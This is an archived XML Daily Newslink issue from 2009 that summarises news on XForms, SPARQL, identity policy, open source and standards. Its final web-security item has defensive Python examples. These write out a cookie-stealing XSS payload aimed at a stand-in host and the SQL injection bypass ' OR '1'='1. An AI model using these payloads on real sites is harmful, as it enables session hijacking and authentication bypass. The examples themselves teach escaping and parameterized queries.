The OASIS Cover Pages: The Online Resource for Markup Language Technologies
Last modified: November 03, 2009
XML Daily Newslink. Tuesday, 03 November 2009

A Cover Pages Publication
Provided by OASIS and Sponsor Members
Edited by Robin Cover

This issue of XML Daily Newslink is sponsored by:
Sun Microsystems, Inc.

Call for Proposals: IEEE Key Management Summit 2010 (KMS 2010)
Matt Ball, Conference Announcement

The Key Management Summit 2010 (KMS 2010) program committee has updated the website for the 2010 IEEE Key Management Summit, which will be held at Lake Tahoe, NV, on May 4-5, 2010.

"In 2008, we had the first successful IEEE Key Management Summit, but left with a sense that there is still much work left to do with providing cryptographic key management services that meet the growing needs of data encryption systems. As a follow-on, we've scheduled the 2010 IEEE Key Management Summit to see how we've done and what's still left to do. KMS 2010 is co-located with the IEEE Mass Storage and Systems Technologies conference (MSST) in Lake Tahoe, Nevada...

We are currently seeking speaking proposals. If you would like to propose a topic, please send a description to [the KMS 2010 Chair]. The deadline for proposal submission is December 31, 2009...

Topics for paper proposals include, but are not limited to: (1) Standards efforts relating to key management; (2) Government policies around key management; (3) Customer case studies; (4) Panel discussions; (5) Key management technologies, avoiding specific vendor references where possible. By signing up for the RSS feed on the blog, you can get updates on the summit as we reach milestones leading up to the event.

The KMS 2010 Chair, as in 2008, is Matt Ball (Sun Microsystems, and Chair, IEEE P1619 Security in Storage Working Group). Program Committee members also include Robert Lockhart (Thales E-Security), Fabio Maino (Cisco Systems), Luther Martin (Voltage Security), Landon Noll (Cisco Systems), Subhash Sankuratripati (NetApp), and Hannes Tschofenig (Nokia Siemens Networks).

See also: the IEEE Key Management Summit 2008

The Key XForms Enhancements in Version 1.1
Kurt Cagle,

XForms 1.0 debuted in 2002 to remarkably little fanfare. After seven years of testing, probing, real-world case studies, and rethinking of the underlying assumptions on which it was based, the W3C recently released XForms 1.1, at a time when people are beginning to seriously examine the potential of the technology. XForms 1.1 has not changed its (apparently unique) underlying structure: an XForms document consists of a model made up of one or more XML instances, along with controls that are bound via XPath to the model. This approach lets you work with the whole model directly in the client, maintain its internal cohesiveness and validity, and send part or all of the model to the server as desired.
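The model-plus-bound-controls structure described above can be sketched as follows. The instance data, IDs, and bindings here are hypothetical; the element names follow the XForms 1.1 vocabulary:

```xml
<xf:model xmlns:xf="http://www.w3.org/2002/xforms">
  <xf:instance id="person">
    <data xmlns="">
      <name/>
      <email/>
    </data>
  </xf:instance>
  <!-- Declarative constraint: the email node must be present and valid -->
  <xf:bind nodeset="email" type="xf:email" required="true()"/>
</xf:model>

<!-- A control bound to the model via an XPath reference -->
<xf:input ref="name">
  <xf:label>Name</xf:label>
</xf:input>
```

Because the bindings are XPath expressions against the instance, the client can validate and update the model without a server round trip.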

This article highlights some of the notable new features of XForms 1.1 and introduces some of the early implementations of this latest version. The enhancements in XForms Version 1.1 do exist and are actually quite significant. For the most part, they are areas where the initial specification was either ambiguous or was becoming outdated in the face of evolving web technologies...

For example: (1) Templates: Templates are easily one of the most requested XForms capabilities. In XForms 1.0, when you insert a new XML construct into the model, it has to come from an existing structure in the instance... (2) Enhanced Submission: Submission has been dramatically beefed up to make XForms content submission much more robust, effectively turning the XForms processor into a first-class client. XForms is now capable of supporting a number of new functions: for example, you can now design submissions to work with SOAP, RESTful services, Atom-based services, and even non-XML output, based upon the serialization attribute. This enables tasks such as uploading just the text contents of a given node or using XForms as a blogging platform... An increasing number of open source projects are producing XForms 1.1 implementations, many of which are proving to be surprisingly effective in their space after a couple of years of foundering.
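As a sketch of the enhanced submission element, the following uses the XForms 1.1 resource and serialization attributes to fetch a resource RESTfully into an instance without serializing the model; the URI and IDs are hypothetical:

```xml
<xf:submission xmlns:xf="http://www.w3.org/2002/xforms"
    id="load-entry"
    resource="http://example.org/entries/1"
    method="get"
    serialization="none"
    replace="instance"
    instance="entry"/>
```

Setting serialization to other values similarly controls what is sent on a POST, which is what enables the non-XML and text-only submissions mentioned above.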

XForms 1.1 is debuting at a time when interest in XML technologies for handling larger-scale projects is rising dramatically. People are beginning to realize that the AJAX revolution by itself is not sufficient to support larger-scale enterprise data-entry solutions, and XForms has been improved considerably in key areas: from more solid support for varying mime-types, to extensibility, to the ability to work with templates and non-XML data. It's the foundation of the new XRX architecture. The combination of XForms on the front end, XQuery on the back end, and REST in the middle makes for a remarkably compelling story that solves many of the issues associated with complex web application design..."

See also: the W3C XForms 1.1 Recommendation

Issues For Responsible User-Centric Identity
Staff, CDT White Paper

"The Center for Democracy and Technology (CDT) has released a white paper highlighting policy issues related to responsible user-centric identification systems. The paper comes as the U.S. Government begins launching a series of pilot programs that will use third-party user credentials to authenticate users to federal Web sites, and it discusses the challenges to be considered as these activities are expanded to provide a better user experience...

In order to be trusted by the government pilot, an identity provider must be operating as part of a trust framework approved by the ICAM Trust Framework Adoption Process. Currently, OpenID Foundation, Information Card Foundation, Kantara Initiative, and the InCommon Federation are active in this process. The trust framework provider must ensure that each identity provider that they certify is behaving within the bounds of the trust framework.

If trust framework providers can establish an appropriate set of rules regarding the minimum obligations of identity providers, relying parties and users, there is a large potential to increase the ease with which trust relationships can be formed online. Particularly for single transactions between parties who do not otherwise know each other, UCI systems have the potential to reduce transaction cost and risk. And, indeed, they may even be useful in enabling the formation of more online communities. However, this model can only be successful if privacy and security are adequately protected and risks and liability are allocated in such a way as to enable enforcement and encourage user adoption. The development of trust frameworks for user centric identity provides a unique opportunity to design truly user-centric and privacy protective identity management..."

See also: the CDT announcement

Cisco, EMC Unveil Data Center Joint Venture
Jim Duffy, Network World

Cisco and EMC this week unveiled their anticipated collaboration, which will provide integrated products and services for customers building private cloud computing infrastructures. The partnership, which also includes virtualization software vendor VMware, is set up in two parts: one is a Virtual Computing Environment coalition to develop the new products; the other is a joint venture, called Acadia, to train customers and partners on how to install and use the products. Cisco and EMC are lead investors in Acadia, while VMware and Intel are minority investors. Acadia will have its own CEO, for whom the companies are searching, and an initial staff of 130. Acadia's main mission will be to accelerate product sales and deployment, perform initial operations, and then transfer operations to customers or partners...

The products being developed by the coalition are called Vblock Infrastructure Packages. They are pre-integrated, tested, and validated packages combining virtualization, networking, computing, storage, security, and management products from the three vendors. There are three Vblocks. Vblock 2 is a high-end configuration supporting 3,000 to 6,000 virtual machines, targeted at large enterprises and service providers... Vblock 1 is a midsize configuration supporting 800 to 3,000 VMs... Vblock 0 will be an entry-level configuration available in 2010, supporting 300 to 800 VMs, aimed at midsize businesses, small data centers, and test and development by customers and partners. Vblock 0 comprises Cisco's UCS and Nexus 1000v, EMC's Unified Storage, and the VMware vSphere platform. Vblock products will be managed by EMC's Ionix Unified Infrastructure Manager and secured by EMC RSA security products..."

See also: the joint announcement

White House Shift to Open Source Draws Mostly Praise
Joab Jackson, Government Computer News

"The U.S. White House's recent deployment of the Drupal open source content management system for its Web site has created a stir among industry observers, who speculate that the move may portend a shift toward more government use of open source, social media and emerging semantic Web technologies.

David Lantner, editor of the ClearType Press blog, noted that Drupal will give the White House a good start in annotating its data in a machine-readable way, if the site's managers choose to do so. Drupal's support for the Resource Description Framework (RDF) "enables authors to add semantics to their markup using attributes that are both machine-readable and human-friendly," Lantner wrote. When formatted with RDF, data can then be parsed by other computer programs in a predictable fashion.

A quick look at the site's source code finds that the pages are formatted to the XHTML-RDFA-1 document type, though no data appears to be formatted in RDF yet. XHTML is an HTML Web page markup language that complies with the Extensible Markup Language standard; RDFa is a version of RDF formatted for HTML..."
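As an illustration of the kind of markup involved (the page content here is hypothetical), an XHTML fragment annotated with RDFa attributes looks like this:

```xml
<div xmlns:dc="http://purl.org/dc/elements/1.1/" about="/blog/open-source-post">
  <h2 property="dc:title">Open Source at the White House</h2>
  <span property="dc:creator">Press Office</span>
</div>
```

An RDFa-aware parser extracts machine-readable triples (here, a title and a creator for the page) from the same attributes a browser simply ignores.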

See also: the DOD guidance document

Microsoft Recommits to $100K Apache Contribution at ApacheCon
Darryl K. Taft, eWEEK

"Microsoft has again committed to its pledge to deliver $100,000 to the Apache Software Foundation over the next couple of years. Microsoft initially announced its plans to commit $100,000 a year to the ASF in 2008 at OSCON, the O'Reilly Open Source Convention. This time, the company announced the recommitment of its contribution at the ApacheCon conference in Oakland, California. The ASF is celebrating its tenth anniversary. Over the past few years, Microsoft has steadily increased its participation in and contribution to the open-source community. For instance, at the recent EclipseCon Europe conference, Microsoft announced plans to make Windows 7 and Windows Server 2008 R2 more accessible to Eclipse developers...

Justin Erenkrantz (ASF President): 'As you know, last year Microsoft announced its Platinum Sponsorship of the ASF, which it continued this year. While we are delighted to have Microsoft's financial support as a sponsor of the Foundation, I think the more important aspect of Microsoft's relationship is that they are now contributing to a variety of Apache projects. Since we announced the sponsorship last year, Microsoft is now contributing to at least four Apache projects: HBase, Stonehenge, QPid, and POI. This really continues the significant sea change from within the organization — Microsoft now isn't afraid of having their employees contribute to Apache projects on Microsoft's time. Committers from Microsoft sign the same legal agreements that we require from all of our contributors'..."

SPARQL Extension Description
Leigh Dodds (ed), Workshop Presentation

This draft document is based upon a presentation at VoCamp 2009, held at the U.S. Library of Congress just following the 2009 International Semantic Web Conference. The "SPARQL Extension Description" specification defines a vocabulary for describing SPARQL extensions and function libraries. "SPARQL" (SPARQL Protocol and RDF Query Language) is a query language for RDF data on the Semantic Web with formally defined meaning. The extension description vocabulary is intended to support the publishing of descriptive terms at the URIs associated with SPARQL extensions to promote interoperability, validation of SPARQL queries, and general ease of use... An accompanying schema is published on the Wiki.

Problem Statement: "There are many SPARQL extensions available from a variety of different SPARQL implementations. SPARQL 1.0 requires extension functions to have a URI; however, those URIs typically do not resolve. It would be useful to publish metadata at those URIs to support interoperability, validation, etc. SPARQL 1.1 includes a Service Description specification which also encourages assignment of URIs to language extensions and entailment regimes, but does not say how to describe those features. By describing functions and extensions, we can support the following use cases: (1) Improve documentation and understanding of SPARQL extensions; (2) Promote interoperability between endpoints by encouraging them to support the same extensions and/or identifying how to map between equivalent extensions; (3) Validate SPARQL queries, determining whether a query uses extensions and whether those extensions are supported by a given endpoint."
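For context, SPARQL 1.0's extension mechanism looks like this in a query. The function URI ex:soundsLike is hypothetical, and it is exactly such URIs that the proposed vocabulary would describe:

```sparql
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX ex:   <http://example.org/functions#>

SELECT ?name WHERE {
  ?person foaf:name ?name .
  # The extension function is identified only by its URI -- nothing at
  # that URI tells a client what the function does or who supports it.
  FILTER ( ex:soundsLike(?name, "Smith") )
}
```

Publishing a description at http://example.org/functions#soundsLike would let tools document the function, validate queries that use it, and map it to equivalent extensions on other endpoints.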

Dodds: "It looks like the SPARQL Working Group may well be adding a standard library of extension functions to the next revision of the query language, so the timing of this work should help contribute to that effort. However, I'm looking beyond their immediate goals and hope to encourage the implementor community to explore models similar to the EXSLT effort, which has been successful in creating a set of community-designed extensions for XSLT transformations. I see no reason why the same process can't be applied to SPARQL extensions. Clarity about which extensions are portable across triplestores is important to allow users to experiment with various triplestore implementations and services. If data is going to be truly portable, then this will be an important consideration..."

See also: the Wiki for SPARQL Extension Descriptions

Talking to Washington DC About Healthcare XML Standards
Adam Bosworth, Weblog

"I was kindly asked to testify at a meeting in DC this week about standards... the discussion was about what actually will work in terms of making health data liquid. What standards should be used for the integration of such data?...

Somewhat to my surprise, and usually to my pain, I've been involved in several successful standards. One was used to exchange data between databases and consumer applications like spreadsheets and Access: it was called ODBC, and it worked surprisingly well after some initial hiccups. Another was the standard for what today is called AJAX, namely building complex interactive web pages like Gmail's. Perhaps most importantly, there was XML. These are the successes. There were also some failures. One that stands out in my memory is OLE DB, an attempt to supplant ODBC. One that comes close to being a failure was/is the XML Schema specification. From all these efforts there were a few lessons learned, and it is these that I shared with DC. What are they?

[For example:] (1) Keep the standard as simple and stupid as possible. (2) The data being exchanged should be human readable and easy to understand. (3) Standards work best when they are focused. (4) Standards should have precise encodings. (5) Always have real implementations that are actually being used as part of design of any standard. (6) Put in hysteresis for the unexpected: this is something that the net formats do particularly well...assume the unexpected [because] false precision is the graveyard of successful standards. (7) Make the specification itself free, public on the web, and include lots of simple examples on the web site...

A lot of standards are written for purposes other than promoting interoperability. Some exist to protect legacy advantages or to create an opportunity to profit from proprietary intellectual property. Others seem to take on a life of their own and seem to exist solely to justify the continued existence of the standards body itself or to create an opportunity for the authors to collect on juicy consultant fees explaining how the standard is meant to work to the poor saps who have to implement it. I think we can agree that, whatever they are, those are usually not good standards. Health data interoperability is far too important an issue to let fall victim to such an approach..."

See also: XML Standards for Healthcare

Web Application Security: Testing for Vulnerabilities
Jeff Orloff, IBM developerWorks

As the Web grows increasingly social in nature, it also becomes less secure. In fact, the Web Application Security Consortium (WASC) estimated in early 2009 that 87% of all Web sites were vulnerable to attack (see Resources for links to more information). Although some companies can afford to hire outside security analysts to test for exploits, not everyone has the resources to spend US$20,000 to US$40,000 on an outside security audit. Instead, organizations must rely on their own developers to understand these threats and make sure their code is free of any such vulnerability...

XSS results from malicious scripts being injected into a Web site. For instance, Mallory writes a script that sends users to a trusted Web site created by Alice. Mallory inserts this script into a popular forum. When Bob sees this link on the forum, he clicks it and creates an account on Alice's Web site. The script, which has exploited an XSS flaw in Alice's Web site, then sends Bob's cookie to Mallory. Mallory can now impersonate Bob and steal information from him...
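The standard defense against this class of attack is to escape untrusted input before embedding it in a page. A minimal sketch in Python (the function and payload are illustrative, not from the article):

```python
import html

def render_comment(user_input: str) -> str:
    """Escape user-supplied text before embedding it in HTML,
    so an injected <script> tag is displayed as text, not executed."""
    return "<p>" + html.escape(user_input) + "</p>"

# A cookie-stealing payload like the one Mallory might post
payload = '<script>location="http://evil.example/?c=" + document.cookie</script>'
print(render_comment(payload))
```

After escaping, the angle brackets and quotes in the payload become HTML entities, so the browser renders the attack string instead of running it.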

SQL injection is the second most popular vulnerability, primarily because of the growing dependence Web sites have on databases. SQL injection is actually quite simple: By finding a Web site that connects to a database, malicious hackers execute an SQL query in a place that the developer never intended for the purpose of bypassing authentication or manipulating data...
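A minimal sketch in Python with sqlite3 (the table and credentials are hypothetical) shows both the flaw and the standard fix, parameterized queries:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_unsafe(name: str, password: str) -> bool:
    # Vulnerable: attacker input is spliced directly into the SQL text.
    q = f"SELECT * FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(q).fetchone() is not None

def login_safe(name: str, password: str) -> bool:
    # Parameterized: input is passed as data and never parsed as SQL.
    q = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(q, (name, password)).fetchone() is not None

# Classic authentication-bypass payload
print(login_unsafe("alice", "' OR '1'='1"))  # True: authentication bypassed
print(login_safe("alice", "' OR '1'='1"))    # False: payload treated as a literal
```

The payload rewrites the unsafe query's WHERE clause into a tautology; the parameterized version compares it as an ordinary (wrong) password.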

To write secure code, you must first understand the threats to which your work is exposed. By knowing what attackers are looking for and addressing these vulnerabilities, you can keep less experienced attackers from breaching a site and make it too much trouble for more organized attackers to bother with..."

See also: Application Security Standards


XML Daily Newslink and Cover Pages sponsored by:

IBM Corporation
Microsoft Corporation
Oracle Corporation
Sun Microsystems, Inc.
